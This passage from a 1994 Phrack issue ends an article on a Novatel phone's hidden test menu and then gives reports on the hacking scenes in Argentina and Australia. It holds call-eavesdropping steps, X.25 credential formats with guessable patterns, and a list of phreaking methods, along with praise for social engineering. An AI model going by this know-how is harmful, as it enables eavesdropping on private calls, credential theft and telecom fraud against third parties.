Novatel, not even their dealers are supposed to know about it. According to Novatel, some of the features in this menu could destroy the phone if improperly set. Scare tactics? You decide. CFG = configuration mode = the hidden menu accessed with 510*. This is used by dealers to set up a subscriber's service. As far as I know, there is nothing particularly dangerous about this mode, but Novatel is touchy about it nonetheless. I take no responsibility for any damages. Troubleshooting Mode - TBL First, lock phone with [FCN] 1 [SND] Then, enter 546* on the keypad. The phone will not make tones for each key pressed. TBL 8325 /___ This is what shows up on my phone. REV NA0C \ Yours may be different. You are now in troubleshooting mode. You may page through the functions by using the arrow keys, or access the functions by number, by hitting # (The screen will display DIR PAGE ACCESS) and then the function number, from the chart below. Note that on initially entering Troubleshooting mode, you are on function 37. Toggle with the [SND] key, unless otherwise noted. # Screen Default Toggle/Range Description ----------------------------------------------------------------------------- 11 TRANSMIT OFF ON Turn the transmitter on. 12 TX TEST OFF [CLR]=OFF, 0-7 test data stream, audio levels of 13 CHANNEL 0000 0000-1023 [H/F] = down, [RCL] = up. 14 TX AUDIO OFF ON 15 VOLUME GAIN 6 0-7 16 RX AUDIO OFF ON Turn the receiver on. Set this to ON and use in conjunction with #13 (CHANNEL) to listen to calls. 17 POWER ATTN 3 0-7 18 SYNTH LOCKED synthesizer locked. if reads unlocked, the phone has real problems. 19 SAT OFF ?? transmitted SAT 20 RF POWER OFF ON Not an option, but an indicator. When TRANSMIT is set ON, this displays ON. 21 SPEAKER ON OFF 22 SIDE TONE ON OFF 23 TX DTMF OFF Tone test. [CLR] then 00-25. DTMF means touch-tone 00 = DTMF 1 01 = DTMF 2 02 = DTMF 3 03 = DTMF A? 04 = DTMF 4 05 = DTMF 5 06 = DTMF 6 07 = DTMF B? 08 = DTMF 7 09 = DTMF 8 10 = DTMF 9 11 = DTMF C? 12 = DTMF * 13 = DTMF 0 14 = DTMF # 15 = DTMF D? 16 = 1+2+3 17 = 4+5+6 18 = 7+8+9 19 = *+0+# 20 = 1+4+7+# 21 = 2+5+8+0 22 = 3+6+9+# 23 = A+B+C+D? 24 = ? 25 = Wake-up-tone. The + signs are use to signify keys simultaneously held on a regular (desk-style) touch-tone phone. These tones are each half of the dual tones the comprise touch tones. 24 RX MODE BURST CONT 25 RX TEST OFF ON 26 FRME CNT 000000 Frame count. (of counter) 27 BIT ERR 0000000 Bit Error. every so often is no big deal. Hit any key to clear. 28 WATCHDOG ON OFF watch-dog periodically checks the timing of the different clocks in the system. Hit any key to turn this off and the Phone re-starts 29 HOOK SW OFF Hook Switch - since a bag phone has no switch hook, always off. 30 HORN MODE ON OFF Toggles indicator light 31 BELL MODE 0 0-9, [SND] 32 RSST 20x Received Signal Strength Indicator 33 MICROPHN ENABLED DISABLED 34 NVM TEST RM=0 E=1 Non-Volatile Memory Test 35 COMPANDR ON OFF A Compander compresses speech to confine energy to the given bandwidth. 36 NVM CLR USE SND Non-Volatile Memory [SND]="ACCESS DENIED" 37 TBL 8325 REV NA0C MENU,MODEL,REVISION (INITAL SCREEN) ------Modulation------- Don't mess with this stuff - it can screw up your phone N0 means channel bank 0. Banks are 0-4. Tune to a mid-band channel using the keypad, and tune with [H/F] down and [RCL] for up. 38 MODG CLR Any Key, 0 = YES resets options #39,#40,#41 to default. 39 CHN 0991 N0 AMG16 AMG = SAD Deviation. 40 CHN 0991 N0 DMG16 DMG = Signalling tone. 41 CHN 0991 N0 SMG12 SMG = Transmit audio level. ------Digital Potentiometers-- DANGER! Play with this, and you may have to send your phone out for repair. 42 DPOT CLR Any Key, 0 = YES resets options #43,#44,#45,#46 to default 43 MICROPHN 14190 OHM 44 EXPANDER 14936 OHM 45 TX LIMIT 12180 OHM 46 SPEAKER 15420 OHM ------Analog Switches-------- Enables/Disables on-board potentiometers. 47 ANALOG SW1 ON High end of transmit audio 48 ANALOG SW2 OFF Low end of transmit audio ----- 49 PWR LVL3 DAC0777 power level, reading from digital-analog converter 50 PL3@0000 14 power level @ channel, received signal strength ==Phrack Magazine== Volume Five, Issue Forty-Five, File 27 of 28 **************************************************************************** International Scenes There was once a time when hackers were basically isolated. It was almost unheard of to run into hackers from countries other than the United States. Then in the mid 1980's thanks largely to the existence of chat systems accessible through X.25 networks like Altger, tchh and QSD, hackers world-wide began to run into each other. They began to talk, trade information, and learn from each other. Separate and diverse subcultures began to merge into one collective scene and has brought us the hacking subculture we know today. A subculture that knows no borders, one whose denizens share the common goal of liberating information from its corporate shackles. With the incredible proliferation of the Internet around the globe, this group is growing by leaps and bounds. With this in mind, we want to help further unite the communities in various countries by shedding light onto the hacking scenes that exist there. If you want to contribute a file about the hacking scene in your country, please send it to us at phrack@well.com. This month we have files about the scenes in Argentina, Australia and Greece. ________________________________________________________________________________ Argentina: Hacking at the ass of the world ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by: OPii. Yeah, i know, it's something you just can't stop, whenever you try to sleep that recurrent idea comes and recurses through your very brain, you are blind, it happens to be worse than MTV, you just can't get to sleep, you stay up for hours, you forget to feed yourself, you can't even remember your name, you turn catatonic, you stand still stretching every nerve and mumbling "hhmmpff..sc.eenn...arghh..teennn..ahhh..." and then you explode in a terrifying scream... "ARRRGHHHHHH, WHAT THE FUCK IS GOING ON IN ARGENTINA??????" Right? NO???? Well, I never really thought that could happened but I'm gonna answer the question anyway, I know you probably don't give a fuck about Argentina and it's scene but, hey, reading shitty text files is not new to you so you wanna change your habits RIGHT NOW? Nahhhhhhhh Introduction ~~~~~~~~~~~~ Ok, enough is enough, so let's get to the point. Argentina is lagging. While other countries are flying toward the hyper publicized "Data Highway", Argentina is still trying to fork it's path in the telecommunication's jungle. And this has it's pros and cons. Before 1990 the telecommunications in Argentina were in hands of Entel, the government's monopolistic arm that ruled the area. But, and there's always a BUT, the service provided by Entel was worse than bad. For too many people it was normal to wait YEARS for a line, paying $1000+ when they finally got it installed, and then a never-ending nightmare began, if it rained, the line went dead, if it didn't die it went crazy, you could pick up the phone and listen to your favorite radio station but of course you could not call anyone. Or you could had bizarre conferences with persons you'd never met...it was basically POTS but with features that Entel never thought about... N-way calling, call forwarding to hell, continuous call waiting in the form of line noise, speed dialing to always busy DNs... Ahh, you could get a line in less than a month if you paid the $1000 to some bogus vapor-companies whose workers would came pulling loops out of their sleeves and installing them quietly (yeah, all completely illegal), these companies were known as the phone mob. Remember, Entel was the ONLY company entitled to give you not only a phone line but the phone itself. And the bills... the bills always had an encrypted message in them, you needed a PhD in Black Magic in order to decipher what the fuck the telco was charging you... but for most mortals the meaning was only one: PAY, pay whatever we order you to pay, and don't ask why. You made only local calls? PAY! (local calls are not free in Argentina) You didn't make that call to Nairobi, Kenya? PAY! Ohh, but you cant dial outside the country with your line? PAY ANYWAY! You want to complain? PAY FIRST! In 1990 the government decided to split Entel in two companies and sell them to private investors, each company would service either the northern or southern Argentina, the border being Buenos Aires' downtown (in case you don't know Buenos Aires is the capital of Argentina). This was nothing more than giving the monopolistic Entel to two new monopolistic companies as we will see. So the government sold Entel and two new companies appeared in Argentina's communications scene: - Telefonica de Argentina. Servicing the southern part of Argentina, this company is formed by the Spanish Telefonica de España (owned by Spanish gov.) and several Argentinian and foreign investors. - Telecom Argentina. Services the northern Argentina and it's major stockholders are France Telecom and STET (Italy). Also, another two companies where born: - Telintar. Owned by Telefonica and Telecom. The ONE AND ONLY LD carrier in Argentina. - Startel. Guess who owns it? Yeah, Telefonica and Telecom, with some philanthropic aides like Citicorp, J.P. Morgan and Techint and Perez Companc ( Argentinian megacorps). Startel provides TELEX and data transmission services as well as mobile and sea radio links. It runs the most known Argentinian X.25 PSN (ARPAC). The government however had to assure minimal control of the companies and verify that their procedures and actions conform to the Argentinian laws. That's the duty of the SNC (National Communications Secretary) and the CNT ( National Telecommunications Commission), the last being some sort of mirror image of the American FCC. Did anything changed with the appearance of Telefonica and Telecom? Did the customers noticed an improvement in the phone service? Both companies began to "correct" Entel's mess rapidly but personally I consider it was a little more than nothing for the customer. They did change loops, trunks, switches, added features, installed inter-office fiber links, private PSNs and more. But, it's 1994 now, and I still know zillions of persons that had their line dead for 4-5 months, or have been visiting the telco offices everyday during a month complaining about line_noise/no_dial_tone/ dial_tone_but_no_dialing/cant_receive_calls/cant_dial_certain_NPAs/ bills_are_way_out_of_scope/etc. To conclude this section I will only say that: 1). There's still a telecom. monopoly in Argentina, now in the form of two private companies. 2). Service got better but it's still a mess, dirty and expensive. 3). Both companies enjoyed an explosive economic grow since 1990, their shares being one of the best things you could get a hold of in the stock exchange. The Phony Phone System ~~~~~~~~~~~~~~~~~~~~~~ Argentina uses pulse dialing, except for those lucky persons that have the latest installed switches in their COs. If you don't have DTMF you HAVE TO ask for it, you can do this dialing 112 (Telecom) or visiting the office (Telefonica and/or Telecom). Someone will eventually listen to you and answer: 1) "Uh???? What's DTMF?" - Forget it, ever considered teaching algebra to a chimpanzee? 2) "I'm sorry you can't dial MF with that line" - No luck 3) "Not a problem, we'll set it for MF" - You bastard! Switches are Step by Step or Crossbars but since 1990 the number of electronic, and specially, digital switches has increased constantly. Both, Telecom and Telefonica, use equipment from many different vendors: Siemmens, Ericsson, Hitachi, Fujitsu, Northern Telecom, AT&T, Alcatel, NEC, Spanish companies, Italians, Norwegians, and God only knows what else. Most switches are either European or Japanesse. As for PBXs, Siemmens, Ericsson and Fujitsu are the brands of choice for most companies, with the recent grow of NT's Meridians among large corporations. DNs are 7 digits but still 6 digits in low line density locations, this includes certain areas in Buenos Aires, the capital. Generally, 6 digit DNs can't complete an international call for themselves, they need operator assistance ( DDI is the "feature" that allows a subscriber to make international calls without operator's assistance, geez). Other features offered are 3-way, conference, call forwarding, call waiting (can't be fucking disabled temporarily!) and more. Telecom also offers a service called "Factel" which is a detailed list of all the calls you made in a billing period (2 months), this comes with your bills and they charge you for EACH PAGE. LOCAL CALLS ARE *NOT* FREE. Toll free numbers (800) where introduced two years ago but so far there are few 800s to call, one of the few is the CNT's 800 for reception of complains about the telco's service. Both Telefonica and Telecom use Frecuency Division Multiplexing (FDM) or Time Division Multiplexing (TDM) for grouping channels with a bandwidth of 4KHz into a multiplexed signal, called Base Band, of several channels. Analog and digital multiplexing is used depending on the equipment installed. The hierarchy of groups is as follows: - Primary Group or Basic Group: 12 4KHz channels for a total bandwidth of 48Khz, generally placed in the 60-108 KHz space. There are three ways for forming a Basic Group: Direct Modulation, Pre-group Modulation or Premodulation, I won't discuss 'em in this article. - Secondary Group (aka Super Group): 5 Primary Groups (PG) for a total of 12x5 = 60 channels and a 240KHz bandwidth., placed in 312-552KHz band - Master Group (MG): 5 SGs, 60x5 = 300 channels, 1232 Khz. bandwidth ( 5x240Khz + 32Khz.) in the 812-2044Khz. band - Super Master Group (SMG): 3MGs, 3x300 = 900 channels 3 x 1232Khz + 176 Khz = 3872 KHz bandwidth. (8516-12388 KHz) For digital multiplexing, using TDM, things are like this: Pulse amplitude modulation (PAM) is first used to sample the 4Khz channel, then the PAM signal is quantified in 256 discrete values ( 8 bits) and this is finally multiplexed as follows: - A basic 2048 Mbit/s for 30 channels (8Khz/channel for they're sampled...) - 8 Mbit/s = 4x2Mbit/s ( 120 channels) - 34 Mbit/s = 4x8Mbit/s ( 480 channels) - 52 Mbit/s = 6x8Mbit/s ( 720 channels) <--this is not standard) - 140 Mbit/s = 4x34Mbit/s ( 1920 channels) - 565 Mbit/s = 4x140Mbit/s ( 7680 channels) - 900 Mbit/s = 6x140Mbit/s (11.520 channels) Both DC and AC is used for signalling depending on several characteristics as trunk length, the switch's technology, etc. Reverse polarity and E and M signalling is used with DC, while DP and MF is used with AC. CCITT #3,CCITT #4 or CCITT #5 is used on international circuits, otherwise R2 is used. I won't go into the details of the different in band signalling methods as they are probably well known by you... i'll only point that, as you guessed, things are set for interesting boxing experiences. Argentina is the place for the casual explorer in this topic, even "Joe customer" could choose alternate routes for his local calls, all by himself, some years ago, prefixing the destination DN with a 3 digit number. There are other interesting things to ponder here, like the way calls from one company's zone to the other company's zone are completed, etc. Also, SxS and Xbar switches are fun to mess with, known their "hidden features" like line freezing, forced ANIF and forced linkage of the circuit to a given CO. Payphones, known as TPAs in local telco. jargon, comes in different flavors. First, the one that both companies inherited from their predecessor, Entel, this one sports a rotary dial and needs tokens to operate. Then the obsoleted Telecom's "card puncher", needed a card with a mag strip that the phone would punch each time you used it, these have been replaced by the new Telecom's modular payphone. (Perhaps it was a piece of shit and Telecom replaced them right away??? ). You wont find one of these easily. Telecom's modular payphone works with cards and wont accept tokens or coins, these have a cute LCD and controls for volume, language selection of the messages displayed as well as buttons for redialing and replacing an exhausted card while a call is in progress. It's uses cards with an 8 contacts on-card chip. Telefonica's payphones accept cards AND tokens, they also have a LCD and buttons for volume, redial, etc. They also use cards with 8 contacts on-card chip. They skipped the "brilliant" card punching stage so these are the phones you'll find in Telefonica's area. NO PAYPHONE WILL ACCEPT REGULAR CREDIT CARDS. ONE COMPANY'S PHONE CARD IS INCOMPATIBLE WITH THE OTHER COMPANY'S PHONES. ( this is supposed the change this year? ) Phone cards cant be recharged when they're exhausted. ( eh, this is not quite true ) Telefonica is said to make their payphones accept regular coins any time noooooooowwwwwwww bahahahahahahah . The Networks ~~~~~~~~~~~~ Networks in Argentina are growing, and are growing fast, but they are still poor and slow when compared to other countries nets. LAN are usually based on PCs with Novell's Netware in its different flavors or some lousy Lantastic. As for WANs, the computers you'll ran into are IBM mainframes, DEC VAXes running VMS, and Unixes (generally IBM's RS/6000 w/AIX or lower end PC clones running SCO). Still, open systems are being happily adopted and TCP/IP based LANs are emerging everyday. There aren't many systems online 24hrs/day but mostly online during work hours. You'll find most systems unreliable, bad configured, and worse used. ARPAC, The Jester's Playground ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ARPAC (DNIC==7222) is the most known PSN in Argentina. It has dialup access in more than 30 cities in the country, although the fastest baud rate for them is an infamous 2400bds. Leased lines go up to a maximum of 19.2Kbds. The protocol used is the X.25 suite and ARPAC offers the following optional facilities: - Closed User Group. (CUG) - Fast Select. - Packet size negotiation. - One-way logical channels. (outgoing/incoming). - Non-standard window sizes. - Reverse charge request and acceptance. - Multipoint access - Incoming/outgoing call blocking. - Incoming/outgoing call blocking to and from CUGs. Obviously these features, should you accept them, imply a little extra bucks in your Arpac bill (which will self-destroy your wallet in five secs.). Startel, the company that runs ARPAC, uses a unit called PTD (it stands for Data Transmission Packet in Spanish) for billing purposes. Packets are 128 bytes and conform a PTD, transmission of 64 bytes or less are considered as 1/2 PTD. Startel vacuum cleans it's customers bank accounts this way: 1) A one time payment for the installation of the X.25 equipment. 2) A "basic monthly payment" that does not include data traffic. 3) A "variable monthly payment" that depends on the number of PTDs handled by Arpac. As for December 1993 this was calculated considering a fee of $0.007595/PTD and 1 PTD/min for leased lines + 4 PTD/min for dialup access. Also remember that those dialing from the PSTN are paying the local call too. There are discounts based on the day of week and hour of the connection: - Type "A" fee (normal fee) Mon-Fri 06:00-20:00 - Type "B" fee (40% discount) Mon-Fri 20:00-24:00 - Type "C" fee (60% discount) Mon-Fri 24:00-06:00 Sat. 20:00-06:00 Sun. and Holidays 00:00-24:00 International connections are not considered in this figure and are billed according to Telintar (LD carrier) fees. A 8% or 18% tax is applicable to all payments. Customers can also choose a fixed monthly payment instead of basic+traffic payments. The software used is that of ITAPAC (DNIC 2222) and as far as i know theres no support to mnemonics instead of the plain X.121 addressing. Nuas are DNIC+10 digit composed this way: [07222]XXXX YYYYY PP ^^^^\^^^^^\^^\__ port/subaddress \ \ \ \_ host \ \ __ corresponds to a "nodal area" in Startel's jargon,usually associated with geographic location. Some valid entries here are: 2111,2141,2171,2511,2211,2911,2172,2912... NUIs, IURs in Startel's babbling, are formed like this: 9XXXXXXXX/YYYYYY ^^^^^^^^\^^^^^^\_ this is the password, normally 5/6 alphanumerics, \ all uppercase. \ \__ da nui! X is in the [0-9] range and generally the whole 8 digits correspond to one of the subscriber's DNs. So if you were to use ARPAC you'd make a call by typing .. upon connection (7E1, <= 2.4kbds) then N9/- ; when using a NUI. or ; w/o NUI needs Reverse Charge ; Acceptance of course. You don't wanna call them NUIs when talking to Startel personnel (i.e. social engineering) unless you want to become instantly suspected to be an evil phraudster (aka haq3R). "CIBA", The Infamous, or BT Tymnet's retarded child (DNIC==7220) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If you cared enough to read the BT Tymnet's worldwide dialups listing you probably noticed a few entries for Argentina. These were regularly used by "net explorers" in the mid 80's and were known as "CIBA" among them. CIBA dialups are 300bds (wow!) and use CCITT v.21 protocol (ATB0 for your modem). At that time the fastest ARPAC dialup was 1200bds. All in all CIBA is nothing more than the door to BT Tymnet in Argentina (node 7407, host 1212). There's no direct access to interesting utilities such as "xray" and the likes. NUIs here were stupidly choosen and easily scanned since they followed two known patterns: naargXXXXna , and enargXXXnet X being in the [0-9] range. Many of these were not passworded. Of course no one would even think to scan NUIs at 300bds nowadays... Internet ~~~~~~~~ The Internet is rarely know and even less used in the student, professor, computer and communications professionals circles. It's a depressive experience to explain the workings of "telnet","rlogin","ftp" and such "eccentricities" to people who were supposed to know about them from their TCP/IP books, courses and lectures. You, reader, could allege that a networked unix system is enough to explain this, but despite the technical explanations, the political, economic and social implications of the Internet will remain unknown until a vast amount of persons actually USE and EXPERIENCE it. And I'm not talking about "Joe citizen" here, I'm talking about people that would actually NEED the net if they were to improve their work. It's like describing the taste of an apple to someone, he'll surely understand what you say but don't expect him to understand what it tastes like until he actually bites it. The Internet top level authority in Argentina is the Foreign Relations Ministry and its link to the rest of the world is sponsored by the 'United Nations Development Programme'. 'whois' output follows: United Nations Development Programme (NET-ARNET) Ministerio de Relaciones Exteriores y Culto Reconquista 1088 ler. Piso - Informatica Buenos Aires ARGENTINA Netname: ARNET-NET Netnumber: 140.191.0.0 Coordinator: Amodio, Jorge Marcelo (JMA49) PETE@ATINA.AR +54 1313 8082 Domain System inverse mapping provided by: ATINA.AR 140.191.2.2 ATHEA.AR 140.191.4.10 Record last updated on 06-May-91. Argentina has only an UUCP link (well, once again this is just the publicly known info...) to the Internet through UUNET, connecting several uucp linked networks to it (RAN,RECYT,etc). Atina.ar is the most important host in this scheme, seconded by the Science and Technology Secretary's host (SECYT) and the University of Buenos Aires (UBA) host located at the Exact and Natural Sciencies Faculty in a dependency known as the "CCC". There's also a company the offers Internet connectivity bypassing atina and uunet. 'whois' output: SatLink Uucp/Internet (SATLINK-DOM) Casilla de Correo 3618 (1000) Correo Central Buenos Aires ARGENTINA Domain Name: SATLINK.NET Administrative Contact, Technical Contact, Zone Contact: Stolovitzky, Horacio (HS3) postmaster@SATLINK.NET +54-1-983-6740 Domain servers in listed order: NKOSI.WELL.SF.CA.US 192.132.30.4 WELL.SF.CA.US 192.132.30.2 Record last updated on 24-Mar-93. There are other links that bypass atina and uunet, all of them part of corporate networks. (i.e. IBM's VNET, etc) Although everyone says theres only a UUCP link to the Internet, word is that there are a few hidden 9600bds leased lines shared among many hosts at some sites, at any rate this is completely insufficient for servicing researchers, students and other interested parties, thus the existence of these links is kept as a sort of secret. 64kbds links are supposed to be installed for interactive sessions this year at certain sites. Other networks ~~~~~~~~~~~~~~ Many companies form their corporate networks as CUGs on Arpac, have their own network, or both. Telcos, consulting firms, banks and insurance companies fall in these categories and are quite interesting research projects for the inquisitive hacker. The "Scene" ~~~~~~~~~~~ There's not much to say about the Argentinian scene. Given the cost and the time you have to wait to get a phone line installed there aren't many BBSes up 24hrs. Most of them are up during nighttime, from 10:00/11:00 pm to 6:00/7:00am, of these, very, very few are dedicated to hack/phreak topics. Also, considering that theres no decent internet access at your local university you would be forced to explore X.25 networks in order to fulfill your natural interest and seek of knowledge. But there aren't many hackers either. Most Argentinians you'll find on the nets are mere abusers with one final goal: to get to QSD or the likes. While this sounds rather amusing (eh) there's an explanation to it. In the mid 80's a few Argentinians used to exploit CIBA's clueless procedures for choosing NUIs. At that time the fastest ARPAC dialup was 1200bds so 300bds was not that bad after all, and not bad at all as you were sure you could find a new NUI in a matter of hours. Yes, many people wasted their diminishing lifes in QSD, but for some this new x.25 thingie was more than a mean for meeting friends over the net and having endless chats with them, some needed to learn and understand the workings of the nets and the many different systems hooked to it. For those the place was Altos, and AMP (although you couldn't connect to PSS directly). And Altos proved to be of great help for Argentinians that got introduced to the hack/phreak world not on a BBS but right on a X.25 network. And so did the sequel of Korn-chat sites (tchh,lutzifer, italian "artemus") or even Pegasus and LINA sometimes. Around '89 or '90 an Efinet (Efinet == Fidonet wannabe) meeting was held, and during it someone gave out a "strange bunch of numbers in the form of some sort of code or something" (this being an ARPAC NUI followed by QSD's NUA) and the attendees ran home and tested it, just to see them connected to the France chat extrordinaire. Meanwhile, things were getting hot elsewhere in the world, and those once famous X.25 hangouts went virtually dead, so these newcomers wouldn't get in touch with Argentinian hackers (as they wouldn't appear in QSD) or other countries' hackers (as they were having a bad time or retiring or simply leaving X.25 alone). So, even if they wanted to learn, these freshmen, for good or for bad, were on their own and still are... The vast majority of the argentine society never heard the words "hacker" or "phreaker" or, if they did, they relate it to things happening in other countries, far, far away. It wasn't until '93, in accordance with the apparently boundless tendency to use the word "cybersomething" when referring to anything remotely related to new technologies, computers, or scifi novels or any other thing that requires publicity, i.e. see cyberIdol's cybershitty cyberCD to understand what I cybermean, uhg excuse me, back to the point... It wasn't until '92 or '93 that the media discovered this brilliant trend for selling more and more, apparently some genius said: "Hey, what if we sell the future? What if we write about how will life be, how will technology be, how will the planet be, how will your dog be? All this with some vague journalistic odor of course. I bet we will sell more!". So they did, and in this frame the hacker/phreak scene is more like the salt to dress the salad, yet things didn't get to the extreme of sensationalism and hacking is portrayed as an activity bound to some new sort of romanticism, still things are very much confused, putting hackers, phreakers, crackers, pirates, virii authors and mere fraudsters all together in the same bag (yes, but what would you expect anyway?). Even some interviews to an ex-hacker (who now runs a data security firm), and a self proclaimed "expert" ( more a virus expert, IF anything) have appeared. On the other side, many "eleet poseurs" have appeared too, but as one could expect, they are nothing more than mere poseurs and certainly not worth more than a phrase here. Final Words! ~~~~~~~~~~~~ This is the 'scene' AS I SEE IT, i don't consider myself an enlightened entity, thus I acknowledge my description might not be objective nor complete (in fact it might be complete bullshit but, do I care? do YOU care?). Argentina is a country where lots of things are still there, waiting to be discovered, virgin beaches for you to explore and enjoy. Security is generally lax, and people is generally not security-aware and even less hacker-aware, trashing and social engineering are simple things that DO give many benefits. As far as I know theres no specific law dealing with computer related crimes (whatever that mean...), and as long as you don't get yourself involved in the traditional crime pictures you are pretty much safe. On the other hand, the bad and expensive phone service, the lack of internet connectivity and the limited number of BBSes dedicated to the so called "underground" (yes, I did it, I used the damned word, argh) make things tougher for newcomers. Perhaps the most interesting thing is that there's not much knowledge of what hacking/phreaking means and this gives us an unique opportunity to avoid misunderstandings and errors that occurred in other countries. Perhaps it is possible to influence people in a positive way, making them think about secrecy, security, privacy and responsibility issues. We are still free of Geraldos, we didn't suffer witch hunts ala Operation Sundevil, the words "hacker" and "phreaker" have not been demonized yet, although the Orwelian-way is common practice among the telcos, but nobody seem to give a fuck about this, or maybe nobody notice?. So, this is it, the file has come to an end and I think it's enough for an introduction, I did not cover cellular telephony nor satellite links and companies providing related services, I did not mention many other things but my intention was to write a description of how things are here, not a fucking encyclopedia. If you think that many topics are deliberately vague and not covered in deep, that some information might be not accurate or if you don't agree with anything I've stated you can contact me at: HBO +541-788-4850 24hrs. Loser's joint +541-658-7983 23:00-6:00 (GMT -3) Here's my PGP key. DO USE IT OR EXPECT NO REPLIES -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAi1EBdUAAAEEAMdEmi+ajN/WIIvN3jjUQk/wb0CLsXe+K49fX8DuUXvUSpdJ UCu8wFH82reJWttj3vaMQ/guKADC/VTIbfsRGWZhbvc+7Mb0W/3LPJSj5zpG9O+M +XF6A7eB6IfncS+p9jU5Tb9lMc/H0BoW4VTpYO/eWK9DJGfAFOA/puxL3X5tAAUR tB1PUGlpIDxvcGlpQGJpYXBiYS51YmEuZWR1LmFyPg== =rKbG -----END PGP PUBLIC KEY BLOCK----- ------------------------------------------------------------------------------ The Australian Underground ( or The lack thereof! ) by Data King ATTITUDE For several years now the Australian underground scene has turned better yet worse at the same time. The amount of companies and colleges using datacomm has dramatically increased. In my opinion it is still not yet to the stage of America in this respect though. The number of 'hackers' has increased, but I use the term loosely as I do not consider many of these so called 'hackers' to be hackers. Why do I say this? I say this because most people who hang out in the underground scene in Australia consider hacking to be getting an account at a university off of a friend and then snarfing the password file and running crack over it. They are only interested in things that will give them access to IRC, FTP & Newsgroups. ( No flames please I am talking in general here! ) Many of them have never heard of services like MIDAS, Minerva & AUSTPAC and even if they were given a dialup to one of these services I doubt they would have a clue about how to use it. We have a wealth of services out there just waiting to be tried, but there is almost no one who is interested in doing so, to give you an example. One night I was working away on my box at about 3am and a 'hacker' mate had crashed on the couch. I went to dial into one of the local universities and I misdialed the number. At first I didn't realize that I had dialed the wrong number since I got a carrier. My modem connected and then just sat there instead of the usual annex prompt. I bashed the old enter key a few times and suddenly I was presented with a menu to an accounting system. 'Sheet,' I thought, and screaming to wake my mate up ( at this stage I thought I had connected to the university and it hadn't reset the line after the last user hung up ) I started to explore the system, it soon became evident that it wasn't the university but something entirely different, by this time my 'hacker' mate had woken up. 'Whaaaaaaaaat?' comes the response from the couch, I briefly explained what had transpired and his only response was 'Ughhhhh' as he went back to sleep. Needless to say I spent the next 3 hours playing with the system, and by the time I had finished I could crash the accounting menu and exit to the operating system. The system turned out to be fairly boring and proved to be of no use to me, BUT I had to assume that before I knew, it could have been something really interesting and to spend time fully exploring it, where as my 'hacker' mate couldn't give a stuff, 'coz it wasn't on internet'. TECHNIQUES Australian Hackers no longer seem to be using advanced techniques to penetrate a system, very few would have any idea how to use TCP/IP to gain access to a system. Most satisfy themselves with obtaining an id elsewhere and then snarfing the password file and running crack over it. When it comes to things such as VMS the attitude I usually encounter is "VMS urgh, what bloody good is it!". There are some very good Hackers in Australia but most of them do not hang around in the underground scene, rather they are usually university students who learn how to make the best use of the system. Writing things like ICMP bombs, and Sniffers is usually left to these people, in fact I can not think of any active non university student hacker who lives in Australia and uses these sort of techniques. CONS To the best of my knowledge there has only ever been one underground conference in Australia, and that was from memory in 1984, it was called Hackfest and it was nothing compared to HOHOCON or Hacking at the End of the Universe. At the time we all thought it was great, and I must admit it did boost the sharing and finding of new info for a while. I, in association with one or two others, have been thinking of arranging another Hackfest to be held in 1994, it will probably be held in Melbourne, Australia. If you live in Australia and would like to attend then mail me and I will keep you informed. ( Det. Sgt. Ken Day: Don't bother trying to spy on Hackfest if it goes ahead, you're more than welcome to attend! ) NETWORKS In Australia we have several national and international networks, here is a list of some of them: MIDAS International Packet switching network DNIC = 5053 Minerva Automated Office Network w/ International PSS AUSTPAC Australian Packet Switching Network DNIC = 5052 SprintNET Need I explain this??? AARNET The Australian Network that covers Internet in Australia TRAN$END Subset of Austpac ( used by Banks for ATM/EFTPOS transmissions ) Compuserve Need I explain this??? Discovery Australian Videotext system ( Not sure if still in Service ) ????? The Australian Military Network ( Don't know its name ) TAXLAN The Australian Tax Office ( IRS ) Network PHREAKING For years people in Australia believed that phreaking was only really possible by pitting, this included Telecom Investigations Department, but we know that this is not true. Methods that have been used in Australia include: Blue Boxing off of an American Operator Line Pitting ( ie: Linemans handset connected to a telecom junction box ) Clicking ( Electric shock to a public phone ) Boxing off of a disconnected number ( almost impossible now ) Calling Cards ( both American and now Australian Calling Cards ) PBX's ( 0014-800's and local PBX's ) Mobile Telephones ( ie Cellular Phones and b4 that the old Radio mobiles ) There are probably other methods as well but I am not a phreaker so I am not the best person to comment on this. Boxing in Australia is getting dangerous now as we are getting more and more of the new digital exchanges which make it a lot easier to trace, or at least so I am told. There were some people in South Australia making/recharging Telephone cards, ( Like a disposable calling card, but you buy them in news agents and they have a dollar value, once used up you throw them away ) but these people were apparently caught and telecom have taken measures to ensure that this is no longer possible. VMB'S We have a large range of VMBs in Australia, and with the proliferation of VMBs has come the art of Hacking VMBs, we even have people here in Australia that do virtually nothing else other than play with VMBs. These people tend to go a lot further than just cracking the pin numbers, some of them have learned enough about the signalling systems used by these systems to virtually take control of the system and make it do what they want. Once again this is an area that I do not know a lot about. We also have a couple of individuals that run something called the Scene Inpho line, Which essentially is a VMB with a long recorded message giving out tips, rumors, and general rubbish. The number to the Scene Inpho Line unfortunately constantly changes as the owners of the VMB notice what's going on and shut that particular box down. BULLETIN BOARDS There are not a lot of good underground BBS's in Australia, a couple that I know of that come to mind are Destiny Stone II, Empire of Darkness, & Watchtower. I can not comment on Destiny Stone II as I have never called it. However, when I used to called Empire of Darkness it was so lame it wasn't funny and now he has gone 96+ only I can't call it ( I'm poor and can't afford a new modem ;) ). Watchtower showed potential but unfortunately the sysop of it is very slack and needs to get off of his butt and do some work on it! The underground boards in Australia tend to reflect the general state of the scene, ie: complete and total apathy! Most H/P boards in Australia are also warez sites and tend to be pretty lame and insecure because of all the warez puppies on them, I can not think of a really good board in Australia that is still operating. BUSTS In the last year the Australian Federal Police, Computer Crimes Unit has been quite busy raiding people. As a result there have been 4 convictions that I know of, and another 2 people waiting for charges to be laid. The people convicted and there sentences are as follows: Data King (me) Guilty but no record ( escaped conviction under section 19b of the act ) $300.00 fine and $500 2 year Good Behavior bond. ( Pleaded Guilty to 2 Charges ) Electron 6 Months Jail ( suspended sentence ), $500 6 Month Good Behavior bond, & 300 hours Community Service Work. ( Pleaded Guilty to 14 Charges ) Nom 6 Months Jail ( suspended sentence ), $500 6 Month Good Behavior bond, & 200 hours Community Service Work. ( Pleaded Guilty to 2 Charges ) Phoenix 12 Months Jail ( suspended sentence ), $1000 12 Month Good Behavior bond, & 500 hours Community Service Work. ( Pleaded guilty to 15 Charges ) In the most part people get busted in Australia due to either their 